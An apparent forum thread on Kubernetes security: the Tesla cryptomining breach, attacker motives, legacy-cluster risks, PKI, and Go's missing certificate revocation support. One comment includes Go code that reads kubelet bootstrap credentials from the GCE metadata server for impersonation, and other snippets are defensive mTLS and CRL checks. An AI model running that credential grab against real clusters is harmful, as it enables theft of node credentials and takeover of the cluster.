Earlier this year, Tesla suffered a cryptocurrency-mining malware infection caused by a misconfigured Kubernetes console. The attackers exploited the fact that the console wasn't password protected, which let them access a pod containing credentials for Tesla's larger AWS environment.
Given the amount of driving data that Tesla has, and the apparent scope of the breach, I’m surprised the attackers only mined some crypto. Wonder if that’s because the data is well segregated, or if mining crypto is just more profitable than extracting and leaking data?
From the logs I could watch the attackers spend an hour learning how to exploit some vulnerable PHP code, then learning how the customer's admin area worked. Then they changed the HTML on some rarely seen pages to include Google ads pointing to an account controlled by the attacker. And that was it - no trace of any other monetization or destruction.
The site in question was selling $1,000-a-pop training courses via authorize.net. Given the access the attackers had, they could have made off with an awful lot of credit card numbers.
In a perfect free market for crime, this would never happen. A break-in criminal would sell access to the organization that could extract the most “value” from the target. But as it is, many exploiters lack the connections to do this, and so usually follow the same “monetization” pattern on target after target.
> In a perfect free market for crime, this would never happen. A break-in criminal would sell access to the organization that could extract the most “value” from the target.
I don't know what you mean by "a perfect free market for crime", but penalties are presumably stiffer for credit card theft than for ad fraud, and more resources will be dedicated to finding the thief in the more severe case. So selling ads might be the right risk/reward blend for more "conservative" hackers.
Mining crypto is seen as untraceable and therefore "safe". Plus the mining code scales very well, in that it can be run on a great many different hosts at once.
On the surface at least, the crime is seen as extremely low risk with the potential for a massive reward should one get lucky.
Something I often don't see mentioned -- be wary of older (as in lifetime, not version), long-running clusters. I have found multiple times that a product has vulnerabilities because I can land in an "older" cluster that predates various security enhancements made to provisioning, IaaS lockdown, etc. Old clusters will almost surely not benefit from those enhancements, because the "fixes" live in the initial configuration.
(As an example, "SomeProduct" allowed users to run somewhat arbitrary, non-privileged, non-root containers. I assumed it was K8s and poked around. All clusters were on GCE and ostensibly running the same versions, but due to how they were initially deployed, they had different levels of vulnerability. The older clusters predated GCE blocking the metadata server, and predated the existence of TLS bootstrapping for the kubelet, so on some of their clusters it was easy to grab the kubelet's key+cert and impersonate the kubelet as an unprivileged user. Catching these things sort of requires having someone who pays a fair amount of attention upstream and/or knows the details of k8s provisioning.)
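To make that concrete, here's a rough sketch of the metadata grab from inside a pod. Assumptions flagged: this presumes a pre-lockdown GCE cluster, and the kube-env instance attribute is how older GKE-style provisioning handed bootstrap material to nodes, so treat the specifics as illustrative:

```go
package main

import (
	"fmt"
	"io"
	"net/http"
)

func main() {
	// On clusters that never blocked pod access to the GCE metadata
	// server, instance attributes are one unauthenticated HTTP call away.
	req, err := http.NewRequest("GET",
		"http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env", nil)
	if err != nil {
		panic(err)
	}
	// GCE requires this header, but any code running in the pod can set it.
	req.Header.Set("Metadata-Flavor", "Google")

	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()

	body, _ := io.ReadAll(resp.Body)
	// On vulnerable, pre-TLS-bootstrapping clusters this output included
	// the kubelet's certificate and key -- enough to impersonate the kubelet.
	fmt.Println(string(body))
}
```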
What about PKI? I ran a decent-size K8s cluster for a while and proper PKI was a pretty important thing IMHO. Everything running in a K8s environment supports PKI (roots, intermediates, client/server CN/RBAC verification, etc.) and there's no excuse not to set things up properly when tools like cfssl exist and can be automated in deployment pipelines.
Edit: CRL[0] and OCSP (maybe?) appear to be coming soon.
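For a sense of what that buys you, here's a minimal Go sketch of client-cert verification against an internal CA. The file paths are placeholders for whatever a cfssl pipeline emits:

```go
package main

import (
	"crypto/tls"
	"crypto/x509"
	"log"
	"net/http"
	"os"
)

func main() {
	// Hypothetical path: the CA bundle your cfssl pipeline issued.
	caPEM, err := os.ReadFile("/etc/pki/cluster-ca.pem")
	if err != nil {
		log.Fatal(err)
	}
	clientCAs := x509.NewCertPool()
	if !clientCAs.AppendCertsFromPEM(caPEM) {
		log.Fatal("no CA certs parsed")
	}

	srv := &http.Server{
		Addr: ":8443",
		TLSConfig: &tls.Config{
			// Require a client cert and verify it against the internal CA.
			ClientAuth: tls.RequireAndVerifyClientCert,
			ClientCAs:  clientCAs,
		},
		Handler: http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
			// The verified CN becomes the identity you can authorize against.
			w.Write([]byte("hello, " + r.TLS.PeerCertificates[0].Subject.CommonName))
		}),
	}
	log.Fatal(srv.ListenAndServeTLS("/etc/pki/server.pem", "/etc/pki/server-key.pem"))
}
```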
CRL and OCSP have been asked for for a very long time! I don't see them coming anytime soon.
The golang TLS library author has a thing against them, so he chose not to implement them[0].
Personally, I think he's wrong. He's describing a web-browser-style use case, not an internally managed CA for a single specific service, and he's then applied that reasoning to a language's TLS library. That has left essentially all TLS in golang without revocation support.
For Kubernetes, you'll need to wire up nginx/haproxy/whatever in front of every endpoint to do TLS+CRL checks before handing the connection off to the actual backend (kube-api, kubelet, etc.) over 127.0.0.1 (still with SSL! Loopback is not safe when untrusted code is running on your server...).
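If the endpoint is your own Go code, another workaround is bolting a revocation check onto crypto/tls via the VerifyPeerCertificate hook. A minimal sketch, assuming a DER-encoded CRL distributed to hosts out of band (the path is a placeholder; x509.ParseRevocationList is the current stdlib API, older Go only had the now-deprecated x509.ParseCRL):

```go
package main

import (
	"crypto/tls"
	"crypto/x509"
	"errors"
	"log"
	"os"
)

// crlDenylist loads a CRL and returns a VerifyPeerCertificate hook
// that rejects any chain containing a revoked serial number.
func crlDenylist(crlPath string) (func([][]byte, [][]*x509.Certificate) error, error) {
	der, err := os.ReadFile(crlPath)
	if err != nil {
		return nil, err
	}
	crl, err := x509.ParseRevocationList(der)
	if err != nil {
		return nil, err
	}
	return func(rawCerts [][]byte, verifiedChains [][]*x509.Certificate) error {
		for _, chain := range verifiedChains {
			for _, cert := range chain {
				for _, rc := range crl.RevokedCertificateEntries {
					if cert.SerialNumber.Cmp(rc.SerialNumber) == 0 {
						return errors.New("certificate has been revoked")
					}
				}
			}
		}
		return nil
	}, nil
}

func main() {
	check, err := crlDenylist("/etc/pki/cluster.crl") // hypothetical path
	if err != nil {
		log.Fatal(err)
	}
	cfg := &tls.Config{
		// Standard chain verification still runs first; this hook then
		// sees the verified chains and adds the revocation check Go omits.
		VerifyPeerCertificate: check,
	}
	_ = cfg // plug into tls.Dial / http.Transport / tls.Listen as needed
}
```

It works, but everyone ends up hand-rolling the check the library refuses to own, which is exactly the complaint.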
The thing I love about Kubernetes is that it's batteries-included and enterprise-first. Sure, it's not as simple as Docker, but when crunch time hits and you need security in depth, the configurability of Kubernetes is unmatched. Perhaps it just needs to be surfaced better.
I got forwarded the CIS Kubernetes Benchmark document a few days back. It had around 100 things that should be set on a cluster before your enterprise's next security audit.
There used to be runnable CIS benchmark tools like neuvector/kubernetes-cis-benchmark[0], but there are fewer these days. Aqua Security also has one called kube-bench[1], which looks to be in better shape.
https://kubernetes.io/blog/2016/08/security-best-practices-k...
https://www.aquasec.com/wiki/display/containers/Kubernetes+S...
https://dev.to/petermbenjamin/kubernetes-security-best-pract...
https://techbeacon.com/hackers-guide-kubernetes-security
https://www.sumologic.com/blog/devops/kubernetes-security-be...
https://news.ycombinator.com/item?id=16764743
https://speakerdeck.com/ianlewis/kubernetes-security-best-pr...
https://dzone.com/articles/kubernetes-security-best-practice...
and a quick search reveals a full-length e-book about it:
https://info.aquasec.com/kubernetes-security-sem (https://kubernetes-security.info/)
https://cdn2.hubspot.net/hubfs/1665891/Assets/Kubernetes%20S...